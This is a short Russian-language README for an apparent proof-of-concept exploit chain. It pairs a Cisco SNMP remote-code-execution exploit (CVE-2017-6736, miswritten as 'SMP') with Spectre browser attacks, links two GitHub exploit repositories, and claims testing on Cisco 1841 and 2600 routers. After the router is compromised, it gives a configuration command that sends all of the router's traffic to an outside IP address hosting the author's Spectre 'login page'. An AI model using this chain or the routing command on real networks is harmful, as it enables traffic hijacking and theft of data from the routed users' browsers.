
Эксплойт цепочки POC, использующий недавний эксплойт Cisco SMP (CVE-2017-6736) для перехода в Spectre (CVE-2017-5753 и CVE-2017-5715)
PoC цепочка эксплойтов, использующая недавний эксплойт Cisco SMP (CVE-2017-6736) для связки со Spectre (CVE-2017-5753 и CVE-2017-5715)
Модуль эксплойта RCE Cisco от artkond: https://github.com/artkond/cisco-snmp-rce
PoC Chrome для Spectre от ascendr: https://github.com/ascendr/spectre-chrome
Протестировано на маршрутизаторе Cisco 1841+2600.
После запуска эксплойта RCE. В качестве конфигурации выполните:
Router(config)> ip route 0.0.0.0 0.0.0.0 195.20.52.49
Это принудительно направит весь трафик через созданную мной страницу входа Spectre. Позже я добавлю улучшенную версию, которая корректно обрабатывает переход на веб-сайты.